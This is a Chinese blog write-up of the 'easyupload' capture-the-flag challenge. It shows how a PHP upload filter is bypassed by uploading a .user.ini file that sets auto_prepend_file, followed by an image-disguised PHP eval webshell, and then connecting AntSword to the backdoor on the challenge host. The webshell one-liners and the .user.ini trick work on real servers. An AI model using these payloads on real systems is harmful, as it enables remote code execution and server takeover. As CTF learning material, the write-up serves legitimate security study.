easyupload-CTF-攻防世界

题目

 

F12查看源代码 

题目提示上传后门

 黑客技术:文件上传漏洞——一句话木马原理 - 知乎 (zhihu.com)

上传包含下述playload的png格式文件

<?php@eval($_POST[“shell”]);?>

 

 报道被过滤了

文件上传漏洞(绕过姿势) - blacksunny - 博客园 (cnblogs.com)

[Web安全]文件上传漏洞及绕过基础详解+实操_截断绕过-CSDN博客

实战 | 文件上传漏洞之最全代码检测绕过总结-腾讯云开发者社区-腾讯云 (tencent.com)

文件上传绕过方法汇总-CSDN博客

尝试bp抓包绕过

各种方法失败.htaccess均被过滤(.htaccess 文件是一个用于配置 Apache Web 服务器的配置文件。它通常位于网站根目录或特定目录中,用来为该目录及其子目录提供特定的配置指令):

尝试.user.ini绕过

由于后端逻辑验证多为php文件实现,故可使用fastcgi的.user.ini特性进行任意命令执行。

.user.ini文件是php.ini的补充文件,当网页访问的时候就会自动查看当前目录下是否有.user.ini,然后将其补充进php.ini,并作为cgi的启动项。其中很多功能设置了只能php.ini配置,但是还是有一些危险的功能可以被我们控制,比如auto_prepend_file。

auto_prepend_file 是 PHP 配置选项之一,用于指定一个在每个 PHP 脚本执行前自动包含的文件。

当 auto_prepend_file 配置启用后,PHP 在执行每个脚本之前会自动将指定的文件包含进来,作为脚本的一部分。这个文件可以包含一些通用的代码、函数、类或初始化操作,以便在每个脚本中都能自动执行。

因此,我们可以传入.user.ini文件,通过auto_prepend_file将含有一句话木马的文件名称包含到每个文件中。然后再上传该文件

利用.user.ini构建php后门_php .user.ini-CSDN博客

新建一个文本文件,将如下写入

GIF89a
auto_prepend_file=x.jpg

左上角文件另存为.user.ini文件 后上传

 由于内容为x.jpg,故抓包后要将Content-Type(内容类型)由application/octet-stream改为image/jpg

注删除一些奇怪的东西,容易上传不成功。要死了,被搞的 。

 再建一个x.jpg文件

GIF89a
<?=eval($_REQUEST['x']);?>

 上传之前F12网络记录加载的文件找到对应的上传地址

http://61.147.171.105:50652/uploads/index.php

在连接webshell注意一个小事项,就是页面返回的上传路径并不是你的蚁剑、菜刀等工具连接时的路径。如果你的连接路径是http://x.x.x.x:端口/uploads/shell.jpg这样的话,是不对的。

正确的连接url地址应为http://x.x.x.x:端口/uploads/index.php   (请回想.user.ini文件及auto_prepend_file方法)

打开地址前面有GIF89a 说明是这个地址不要搞错url不然连接不上(呜呜呜)

上蚁剑连接后门,不要用校园网,会阻断(学校有安全策略)报错。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值